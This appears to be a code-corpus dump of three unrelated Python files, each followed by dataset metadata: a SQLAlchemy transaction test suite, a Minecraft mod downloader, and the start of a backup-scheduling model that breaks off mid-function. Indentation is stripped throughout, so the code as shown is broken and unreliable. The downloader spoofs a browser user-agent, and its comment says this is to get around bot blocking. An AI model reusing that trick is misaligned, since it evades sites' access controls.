assert connection._transaction is None
assert connection.connection._reset_agent is None
assert not t1.is_active
@testing.requires.savepoints
def test_begin_nested_trans_rollback(self):
with testing.db.connect() as connection:
t1 = connection.begin()
assert connection.connection._reset_agent is t1
t2 = connection.begin_nested()
assert connection.connection._reset_agent is t1
assert connection._nested_transaction is t2
assert connection._transaction is t1
t2.close()
assert connection._nested_transaction is None
assert connection._transaction is t1
assert connection.connection._reset_agent is t1
t1.rollback()
assert connection._transaction is None
assert connection.connection._reset_agent is None
assert not t2.is_active
assert not t1.is_active
@testing.requires.savepoints
def test_begin_nested_close(self):
with testing.db.connect() as connection:
trans = connection.begin_nested()
assert (
connection.connection._reset_agent is connection._transaction
)
assert not trans.is_active
@testing.requires.savepoints
def test_begin_begin_nested_close(self):
with testing.db.connect() as connection:
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
assert not trans2.is_active
assert not trans.is_active
@testing.requires.savepoints
def test_begin_begin_nested_rollback_commit(self):
with testing.db.connect() as connection:
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
trans2.rollback()
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
@testing.requires.savepoints
def test_begin_begin_nested_rollback_rollback(self):
with testing.db.connect() as connection:
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
trans2.rollback()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase(self):
with testing.db.connect() as connection:
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase_commit(self):
with testing.db.connect() as connection:
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase_rollback(self):
with testing.db.connect() as connection:
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
class AutoRollbackTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
global metadata
metadata = MetaData()
@classmethod
def teardown_class(cls):
metadata.drop_all(testing.db)
def test_rollback_deadlock(self):
"""test that returning connections to the pool clears any object
locks."""
conn1 = testing.db.connect()
conn2 = testing.db.connect()
users = Table(
"deadlock_users",
metadata,
Column("user_id", INT, primary_key=True),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
with conn1.begin():
users.create(conn1)
conn1.exec_driver_sql("select * from deadlock_users")
conn1.close()
# without auto-rollback in the connection pool's return() logic,
# this deadlocks in PostgreSQL, because conn1 is returned to the
# pool but still has a lock on "deadlock_users". comment out the
# rollback in pool/ConnectionFairy._close() to see !
with conn2.begin():
users.drop(conn2)
conn2.close()
class IsolationLevelTest(fixtures.TestBase):
__requires__ = ("isolation_level", "ad_hoc_engines")
__backend__ = True
def _default_isolation_level(self):
return testing.requires.get_isolation_levels(testing.config)["default"]
def _non_default_isolation_level(self):
levels = testing.requires.get_isolation_levels(testing.config)
default = levels["default"]
supported = levels["supported"]
s = set(supported).difference(["AUTOCOMMIT", default])
if s:
return s.pop()
else:
assert False, "no non-default isolation level available"
def test_engine_param_stays(self):
eng = testing_engine()
isolation_level = eng.dialect.get_isolation_level(
eng.connect().connection
)
level = self._non_default_isolation_level()
ne_(isolation_level, level)
eng = testing_engine(options=dict(isolation_level=level))
eq_(eng.dialect.get_isolation_level(eng.connect().connection), level)
# check that it stays
conn = eng.connect()
eq_(eng.dialect.get_isolation_level(conn.connection), level)
conn.close()
conn = eng.connect()
eq_(eng.dialect.get_isolation_level(conn.connection), level)
conn.close()
def test_default_level(self):
eng = testing_engine(options=dict())
isolation_level = eng.dialect.get_isolation_level(
eng.connect().connection
)
eq_(isolation_level, self._default_isolation_level())
def test_reset_level(self):
eng = testing_engine(options=dict())
conn = eng.connect()
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._default_isolation_level(),
)
eng.dialect.set_isolation_level(
conn.connection, self._non_default_isolation_level()
)
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._non_default_isolation_level(),
)
eng.dialect.reset_isolation_level(conn.connection)
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._default_isolation_level(),
)
conn.close()
def test_reset_level_with_setting(self):
eng = testing_engine(
options=dict(isolation_level=self._non_default_isolation_level())
)
conn = eng.connect()
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._non_default_isolation_level(),
)
eng.dialect.set_isolation_level(
conn.connection, self._default_isolation_level()
)
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._default_isolation_level(),
)
eng.dialect.reset_isolation_level(conn.connection)
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._non_default_isolation_level(),
)
conn.close()
def test_invalid_level(self):
eng = testing_engine(options=dict(isolation_level="FOO"))
assert_raises_message(
exc.ArgumentError,
"Invalid value '%s' for isolation_level. "
"Valid isolation levels for %s are %s"
% (
"FOO",
eng.dialect.name,
", ".join(eng.dialect._isolation_lookup),
),
eng.connect,
)
def test_connection_invalidated(self):
eng = testing_engine()
conn = eng.connect()
c2 = conn.execution_options(
isolation_level=self._non_default_isolation_level()
)
c2.invalidate()
c2.connection
# TODO: do we want to rebuild the previous isolation?
# for now, this is current behavior so we will leave it.
eq_(c2.get_isolation_level(), self._default_isolation_level())
def test_per_connection(self):
from sqlalchemy.pool import QueuePool
eng = testing_engine(
options=dict(poolclass=QueuePool, pool_size=2, max_overflow=0)
)
c1 = eng.connect()
c1 = c1.execution_options(
isolation_level=self._non_default_isolation_level()
)
c2 = eng.connect()
eq_(
eng.dialect.get_isolation_level(c1.connection),
self._non_default_isolation_level(),
)
eq_(
eng.dialect.get_isolation_level(c2.connection),
self._default_isolation_level(),
)
c1.close()
c2.close()
c3 = eng.connect()
eq_(
eng.dialect.get_isolation_level(c3.connection),
self._default_isolation_level(),
)
c4 = eng.connect()
eq_(
eng.dialect.get_isolation_level(c4.connection),
self._default_isolation_level(),
)
c3.close()
c4.close()
def test_warning_in_transaction(self):
eng = testing_engine()
c1 = eng.connect()
with expect_warnings(
"Connection is already established with a Transaction; "
"setting isolation_level may implicitly rollback or commit "
"the existing transaction, or have no effect until next "
"transaction"
):
with c1.begin():
c1 = c1.execution_options(
isolation_level=self._non_default_isolation_level()
)
eq_(
eng.dialect.get_isolation_level(c1.connection),
self._non_default_isolation_level(),
)
# stays outside of transaction
eq_(
eng.dialect.get_isolation_level(c1.connection),
self._non_default_isolation_level(),
)
def test_per_statement_bzzt(self):
assert_raises_message(
exc.ArgumentError,
r"'isolation_level' execution option may only be specified "
r"on Connection.execution_options\(\), or "
r"per-engine using the isolation_level "
r"argument to create_engine\(\).",
select(1).execution_options,
isolation_level=self._non_default_isolation_level(),
)
def test_per_engine(self):
# new in 0.9
eng = create_engine(
testing.db.url,
execution_options={
"isolation_level": self._non_default_isolation_level()
},
)
conn = eng.connect()
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._non_default_isolation_level(),
)
def test_per_option_engine(self):
eng = create_engine(testing.db.url).execution_options(
isolation_level=self._non_default_isolation_level()
)
conn = eng.connect()
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._non_default_isolation_level(),
)
def test_isolation_level_accessors_connection_default(self):
eng = create_engine(testing.db.url)
with eng.connect() as conn:
eq_(conn.default_isolation_level, self._default_isolation_level())
with eng.connect() as conn:
eq_(conn.get_isolation_level(), self._default_isolation_level())
def test_isolation_level_accessors_connection_option_modified(self):
eng = create_engine(testing.db.url)
with eng.connect() as conn:
c2 = conn.execution_options(
isolation_level=self._non_default_isolation_level()
)
eq_(conn.default_isolation_level, self._default_isolation_level())
eq_(
conn.get_isolation_level(), self._non_default_isolation_level()
)
eq_(c2.get_isolation_level(), self._non_default_isolation_level())
class ConnectionCharacteristicTest(fixtures.TestBase):
@testing.fixture
def characteristic_fixture(self):
class FooCharacteristic(characteristics.ConnectionCharacteristic):
transactional = True
def reset_characteristic(self, dialect, dbapi_conn):
dialect.reset_foo(dbapi_conn)
def set_characteristic(self, dialect, dbapi_conn, value):
dialect.set_foo(dbapi_conn, value)
def get_characteristic(self, dialect, dbapi_conn):
return dialect.get_foo(dbapi_conn)
class FooDialect(default.DefaultDialect):
connection_characteristics = util.immutabledict(
{"foo": FooCharacteristic()}
)
def reset_foo(self, dbapi_conn):
dbapi_conn.foo = "original_value"
def set_foo(self, dbapi_conn, value):
dbapi_conn.foo = value
def get_foo(self, dbapi_conn):
return dbapi_conn.foo
connection = mock.Mock()
def creator():
connection.foo = "original_value"
return connection
pool = _pool.SingletonThreadPool(creator=creator)
u = url.make_url("foo://")
return base.Engine(pool, FooDialect(), u), connection
def test_engine_param_stays(self, characteristic_fixture):
engine, connection = characteristic_fixture
foo_level = engine.dialect.get_foo(engine.connect().connection)
new_level = "new_level"
ne_(foo_level, new_level)
eng = engine.execution_options(foo=new_level)
eq_(eng.dialect.get_foo(eng.connect().connection), new_level)
# check that it stays
conn = eng.connect()
eq_(eng.dialect.get_foo(conn.connection), new_level)
conn.close()
conn = eng.connect()
eq_(eng.dialect.get_foo(conn.connection), new_level)
conn.close()
def test_default_level(self, characteristic_fixture):
engine, connection = characteristic_fixture
eq_(
engine.dialect.get_foo(engine.connect().connection),
"original_value",
)
def test_connection_invalidated(self, characteristic_fixture):
engine, connection = characteristic_fixture
conn = engine.connect()
c2 = conn.execution_options(foo="new_value")
eq_(connection.foo, "new_value")
c2.invalidate()
c2.connection
eq_(connection.foo, "original_value")
def test_warning_in_transaction(self, characteristic_fixture):
engine, connection = characteristic_fixture
c1 = engine.connect()
with expect_warnings(
"Connection is already established with a Transaction; "
"setting foo may implicitly rollback or commit "
"the existing transaction, or have no effect until next "
"transaction"
):
with c1.begin():
c1 = c1.execution_options(foo="new_foo")
eq_(
engine.dialect.get_foo(c1.connection),
"new_foo",
)
# stays outside of transaction
eq_(engine.dialect.get_foo(c1.connection), "new_foo")
@testing.fails("no error is raised yet here.")
def test_per_statement_bzzt(self, characteristic_fixture):
engine, connection = characteristic_fixture
# this would need some on-execute mechanism to look inside of
# the characteristics list. unfortunately this would
# add some latency.
assert_raises_message(
exc.ArgumentError,
r"'foo' execution option may only be specified "
r"on Connection.execution_options\(\), or "
r"per-engine using the isolation_level "
r"argument to create_engine\(\).",
connection.execute,
select([1]).execution_options(foo="bar"),
)
def test_per_engine(self, characteristic_fixture):
engine, connection = characteristic_fixture
pool, dialect, url = engine.pool, engine.dialect, engine.url
eng = base.Engine(
pool, dialect, url, execution_options={"foo": "new_value"}
)
conn = eng.connect()
eq_(eng.dialect.get_foo(conn.connection), "new_value")
def test_per_option_engine(self, characteristic_fixture):
engine, connection = characteristic_fixture
eng = engine.execution_options(foo="new_value")
conn = eng.connect()
eq_(
eng.dialect.get_foo(conn.connection),
"new_value",
)
class FutureResetAgentTest(fixtures.FutureEngineMixin, fixtures.TestBase):
"""Still some debate over if the "reset agent" should apply to the
future connection or not.
"""
__backend__ = True
def test_begin_close(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary)
trans = connection.begin()
assert connection.connection._reset_agent is trans
assert not trans.is_active
eq_(canary.mock_calls, [mock.call(connection)])
def test_begin_rollback(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary)
trans = connection.begin()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
assert not trans.is_active
eq_(canary.mock_calls, [mock.call(connection)])
def test_begin_commit(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
trans = connection.begin()
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
assert not trans.is_active
eq_(canary.mock_calls, [mock.call.commit(connection)])
@testing.requires.savepoints
def test_begin_nested_close(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
trans = connection.begin_nested()
assert (
connection.connection._reset_agent is connection._transaction
)
# it's a savepoint, but root made sure it closed
assert not trans.is_active
eq_(canary.mock_calls, [mock.call.rollback(connection)])
@testing.requires.savepoints
def test_begin_begin_nested_close(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
assert not trans2.is_active
assert not trans.is_active
eq_(canary.mock_calls, [mock.call.rollback(connection)])
@testing.requires.savepoints
def test_begin_begin_nested_rollback_commit(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(
connection, "rollback_savepoint", canary.rollback_savepoint
)
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
trans2.rollback() # this is not a connection level event
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
eq_(
canary.mock_calls,
[
mock.call.rollback_savepoint(connection, mock.ANY, None),
mock.call.commit(connection),
],
)
@testing.requires.savepoints
def test_begin_begin_nested_rollback_rollback(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
trans2.rollback()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
eq_(canary.mock_calls, [mock.call.rollback(connection)])
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(
connection, "rollback_twophase", canary.rollback_twophase
)
event.listen(connection, "commit", canary.commit)
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
assert not trans.is_active
eq_(
canary.mock_calls,
[mock.call.rollback_twophase(connection, mock.ANY, False)],
)
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase_commit(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
event.listen(connection, "commit_twophase", canary.commit_twophase)
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
eq_(
canary.mock_calls,
[mock.call.commit_twophase(connection, mock.ANY, False)],
)
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase_rollback(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(
connection, "rollback_twophase", canary.rollback_twophase
)
event.listen(connection, "commit", canary.commit)
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
eq_(
canary.mock_calls,
[mock.call.rollback_twophase(connection, mock.ANY, False)],
)
class FutureTransactionTest(fixtures.FutureEngineMixin, fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
Table(
"users_autoinc",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
def test_autobegin_rollback(self):
users = self.tables.users
with testing.db.connect() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.rollback()
eq_(conn.scalar(select(func.count(1)).select_from(users)), 0)
@testing.requires.autocommit
def test_autocommit_isolation_level(self):
users = self.tables.users
with testing.db.connect().execution_options(
isolation_level="AUTOCOMMIT"
) as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.rollback()
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
@testing.requires.autocommit
def test_no_autocommit_w_begin(self):
with testing.db.begin() as conn:
assert_raises_message(
exc.InvalidRequestError,
"This connection has already begun a transaction; "
"isolation_level may not be altered until transaction end",
conn.execution_options,
isolation_level="AUTOCOMMIT",
)
@testing.requires.autocommit
def test_no_autocommit_w_autobegin(self):
with testing.db.connect() as conn:
conn.execute(select(1))
assert_raises_message(
exc.InvalidRequestError,
"This connection has already begun a transaction; "
"isolation_level may not be altered until transaction end",
conn.execution_options,
isolation_level="AUTOCOMMIT",
)
conn.rollback()
conn.execution_options(isolation_level="AUTOCOMMIT")
def test_autobegin_commit(self):
users = self.tables.users
with testing.db.connect() as conn:
assert not conn.in_transaction()
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
assert conn.in_transaction()
conn.commit()
assert not conn.in_transaction()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
conn.execute(users.insert(), {"user_id": 2, "user_name": "name 2"})
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
assert conn.in_transaction()
conn.rollback()
assert not conn.in_transaction()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
def test_rollback_on_close(self):
canary = mock.Mock()
with testing.db.connect() as conn:
event.listen(conn, "rollback", canary)
conn.execute(select(1))
assert conn.in_transaction()
eq_(canary.mock_calls, [mock.call(conn)])
def test_no_on_close_no_transaction(self):
canary = mock.Mock()
with testing.db.connect() as conn:
event.listen(conn, "rollback", canary)
conn.execute(select(1))
conn.rollback()
assert not conn.in_transaction()
eq_(canary.mock_calls, [mock.call(conn)])
def test_rollback_on_exception(self):
canary = mock.Mock()
try:
with testing.db.connect() as conn:
event.listen(conn, "rollback", canary)
conn.execute(select(1))
assert conn.in_transaction()
raise Exception("some error")
assert False
except:
pass
eq_(canary.mock_calls, [mock.call(conn)])
def test_rollback_on_exception_if_no_trans(self):
canary = mock.Mock()
try:
with testing.db.connect() as conn:
event.listen(conn, "rollback", canary)
assert not conn.in_transaction()
raise Exception("some error")
assert False
except:
pass
eq_(canary.mock_calls, [])
def test_commit_no_begin(self):
with testing.db.connect() as conn:
assert not conn.in_transaction()
conn.commit()
@testing.requires.independent_connections
def test_commit_inactive(self):
with testing.db.connect() as conn:
conn.begin()
conn.invalidate()
assert_raises_message(
exc.InvalidRequestError, "Can't reconnect until", conn.commit
)
@testing.requires.independent_connections
def test_rollback_inactive(self):
users = self.tables.users
with testing.db.connect() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.commit()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
conn.invalidate()
assert_raises_message(
exc.PendingRollbackError,
"Can't reconnect",
conn.execute,
select(1),
)
conn.rollback()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
def test_rollback_no_begin(self):
with testing.db.connect() as conn:
assert not conn.in_transaction()
conn.rollback()
def test_rollback_end_ctx_manager(self):
with testing.db.begin() as conn:
assert conn.in_transaction()
conn.rollback()
def test_explicit_begin(self):
users = self.tables.users
with testing.db.connect() as conn:
assert not conn.in_transaction()
conn.begin()
assert conn.in_transaction()
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.commit()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
def test_no_double_begin(self):
with testing.db.connect() as conn:
conn.begin()
assert_raises_message(
exc.InvalidRequestError,
"a transaction is already begun for this connection",
conn.begin,
)
def test_no_autocommit(self):
users = self.tables.users
with testing.db.connect() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
0,
)
def test_begin_block(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
@testing.requires.savepoints
def test_savepoint_one(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
savepoint = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
savepoint.rollback()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
@testing.requires.savepoints
def test_savepoint_two(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
savepoint = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
savepoint.commit()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
@testing.requires.savepoints
def test_savepoint_three(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
conn.rollback()
assert not conn.in_transaction()
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
0,
)
@testing.requires.savepoints
def test_savepoint_four(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
sp1 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
sp2 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 3, "user_name": "name3"})
sp2.rollback()
assert not sp2.is_active
assert sp1.is_active
assert conn.in_transaction()
assert not sp1.is_active
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
@testing.requires.savepoints
def test_savepoint_five(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
sp2 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 3, "user_name": "name3"})
sp2.commit()
assert conn.in_transaction()
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
3,
)
@testing.requires.savepoints
def test_savepoint_six(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
sp1 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
assert conn._nested_transaction is sp1
sp2 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 3, "user_name": "name3"})
assert conn._nested_transaction is sp2
sp2.commit()
assert conn._nested_transaction is sp1
sp1.rollback()
assert conn._nested_transaction is None
assert conn.in_transaction()
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
@testing.requires.savepoints
def test_savepoint_seven(self):
users = self.tables.users
conn = testing.db.connect()
trans = conn.begin()
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
sp1 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
sp2 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 3, "user_name": "name3"})
assert conn.in_transaction()
trans.close()
assert not sp1.is_active
assert not sp2.is_active
assert not trans.is_active
assert conn._transaction is None
assert conn._nested_transaction is None
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
0,
)
| 34.509615 | 79 | 0.608352 | [
"MIT"
] | 418sec/sqlalchemy | test/engine/test_transaction.py | 57,424 | Python |
#----------------#
# Name: Mod_Obj #
# Author: Photonic #
# Date:U/N #
#----------------#
import urllib2
import os
import sys
# Class Mod defines the mod object
'''
#############################
# Class for "mod" objects. #
# Used to store all data #
# related to mods. #
#############################
'''
class Mod:
def __init__(self, name, url):
self.name = name # Stores the name of the mod (Supplyed by the suer)
self.filename = name + '.jar' # Need to make this a part of the entire file. But I'll do it tomorrow.
self.url = url # Stores the URL of the mod (supplyd by the user)
self.state = 0 # Used to indecate if the mod wass downloaded succssfully
self.installed = 0
#Defines the alternative constructor "create_mod"
'''
#####################################################################################################
# create_mod takes in a string that has two values separated by semicolons i.e ("name:url") #
# and splits them into the vars, name and url which is then fed into the Class "Mod" #
# to create an instance of it's self. i.e "mod = Mod.mod_create("IC2:ic2.download.net")" #
#####################################################################################################
'''
@classmethod
def create_mod(cls, string):
name, url = string.split(':') # Grab the string var and split it at ":" then store the resole inside "name" and "url"
return cls(name, 'https://' + url) # Create instance of the class "Mod" and returns it.
# Defines the fetch function "download_mod"
'''
#########################################################################################
#download_mod takes 'name' and, 'url' then changes the directory to 'temp' #
#then creates a Request header using urllib2 and saves it inside 'request' #
#then it adds a user agent using "add_header". It opens the url and saves it inside #
#response then gets data from responde till there is no data left. #
#########################################################################################
'''
def download_mod(self):
chunk_size = 16 * 1024 # How many bytes to read from the buffer at once
# Attempt to change current directory to 'temp'
try:
os.chdir('temp')
except: # If can't change to "temp" directory, exit the program
print("Error: Could not access directory 'temp', not present or, access denied.\n")
sys.exit()
request = urllib2.Request(self.url) # Create a "Request" and save inside of the var 'raquest'
request.add_header('User-agent', 'Mozilla 5.10') # add a user agent to the header to avoid the pesky bureaucrats attempts at stopping are bot. hehehehe
#Attempt to Open the URL
try:
print("Attempting to connect to ---> {}".format(self.url))
response = urllib2.urlopen(request) # Attempt to open URL@'url' and saves it in 'response'
print("Connected to ---> {}\n".format(self.url))
except:
print("Error: Could not connect to ---> {}\nConnection Dropped, blocked or, nothing is at {}\n".format(self.url, self.url))
sys.exit()
# This is for debugging
#resp_info = response.info() # Get header info
#print(resp_info) # <<< For debugging
# Attempt to download file from URL.
try:
print("Opening file to write to.\n")
with open(self.filename, 'wb') as file_handler: # Open file as 'file_handler'
print("Downloading {},\nThis may take a while.".format(self.filename))
while True:
chunk = response.read(chunk_size) # Read 'chunk_size' from buffer into the var 'chunk'
if not chunk:break # If no more data from 'chunk' break out of loop
file_handler.write(chunk) # Write var 'chunk' to file_handler
self.state = True # Return True if mod succssfully downloaded
print("Succssfully downloaded {}\n".format(self.filename))
os.chdir('..')
except:
os.chdir('..')
print("Error: Could not download {}@{}\n".format(self.filename, self.url))
self.state = False # Return "False" if a Error was encoted while attempting to download the mod file
# Return to sorce dir
#------------------------------------------------------- #
# Checks to seee if mod was downloaded succssfully #
# then changes the directory to temp installs mod inside #
# Inside var 'path' then deletes 'filename' from temp #
# Then delete var 'filename' inside "temp". #
#------------------------------------------------------- #
def install_mod(self, path):
if self.state: # Checks to see if the mod was downloaded succsfully
try:
os.chdir("temp") # Attempts to change the directory to temp
except:
print("Error: Could not access directory 'temp', not present or, access denied.\n")
try:
print("Attempting to Install {}.".format(self.filename))
os.rename("{}\{}".format(os.getcwd(), self.filename), "{}\{}".format(path, self.filename)) # Attempts to copy the file to 'path'
print ("Mod Succssfully Installed.\n")
os.chdir('..')
return 1
except:
print("Error: Problem Installing mod, file or directory not found or, insufficient privileges\n")
os.chdir('..')
return 0
try:
os.chdir('temp')
os.remove(self.filename)
os.chdir('..')
except:
os.chdir('..')
else:
print('Skipping {}\n>>>>\n'.format(self.filename))
| 44.370968 | 157 | 0.57361 | [
"BSD-2-Clause"
] | photonic-bit/TripleM | Main/Mod_Obj.py | 5,502 | Python |
from datetime import datetime, timedelta
from io import IOBase
from typing import Dict, Generic, List, Optional, Tuple, TypeVar
from injector import inject, singleton
from .backupscheme import GenerationalScheme, OldestScheme, DeleteAfterUploadScheme
from backup.config import Config, Setting, CreateOptions
from backup.exceptions import DeleteMutlipleBackupsError, SimulatedError
from backup.util import GlobalInfo, Estimator, DataCache
from .backups import AbstractBackup, Backup
from .dummybackup import DummyBackup
from backup.time import Time
from backup.worker import Trigger
from backup.logger import getLogger
logger = getLogger(__name__)
T = TypeVar('T')
class BackupSource(Trigger, Generic[T]):
def __init__(self):
super().__init__()
pass
def name(self) -> str:
return "Unnamed"
def title(self) -> str:
return "Default"
def enabled(self) -> bool:
return True
def needsConfiguration(self) -> bool:
return not self.enabled()
def upload(self) -> bool:
return True
def icon(self) -> str:
return "sd_card"
def freeSpace(self):
return None
async def create(self, options: CreateOptions) -> T:
pass
async def get(self) -> Dict[str, T]:
pass
async def delete(self, backup: T):
pass
async def ignore(self, backup: T, ignore: bool):
pass
async def save(self, backup: AbstractBackup, bytes: IOBase) -> T:
pass
async def read(self, backup: T) -> IOBase:
pass
async def retain(self, backup: T, retain: bool) -> None:
pass
def maxCount(self) -> None:
return 0
def postSync(self) -> None:
return
# Gets called after reading state but before any changes are made
# to check for additional errors.
def checkBeforeChanges(self) -> None:
pass
class BackupDestination(BackupSource):
def isWorking(self):
return False
@singleton
class Model():
@inject
def __init__(self, config: Config, time: Time, source: BackupSource, dest: BackupDestination, info: GlobalInfo, estimator: Estimator, data_cache: DataCache):
self.config: Config = config
self.time = time
self.source: BackupSource = source
self.dest: BackupDestination = dest
self.reinitialize()
self.backups: Dict[str, Backup] = {}
self.firstSync = True
self.info = info
self.simulate_error = None
self.estimator = estimator
self.waiting_for_startup = False
self.ignore_startup_delay = False
self._data_cache = data_cache
def enabled(self):
if self.source.needsConfiguration():
return False
if self.dest.needsConfiguration():
return False
return True
def allSources(self):
return [self.source, self.dest]
def reinitialize(self):
self._time_of_day: Optional[Tuple[int, int]] = self._parseTimeOfDay()
# SOMEDAY: this should be cached in config and regenerated on config updates, not here
self.generational_config = self.config.getGenerationalConfig()
def getTimeOfDay(self):
return self._time_of_day
def _nextBackup(self, now: datetime, last_backup: Optional[datetime]) -> Optional[datetime]:
timeofDay = self.getTimeOfDay()
if self.config.get(Setting.DAYS_BETWEEN_BACKUPS) <= 0:
next = None
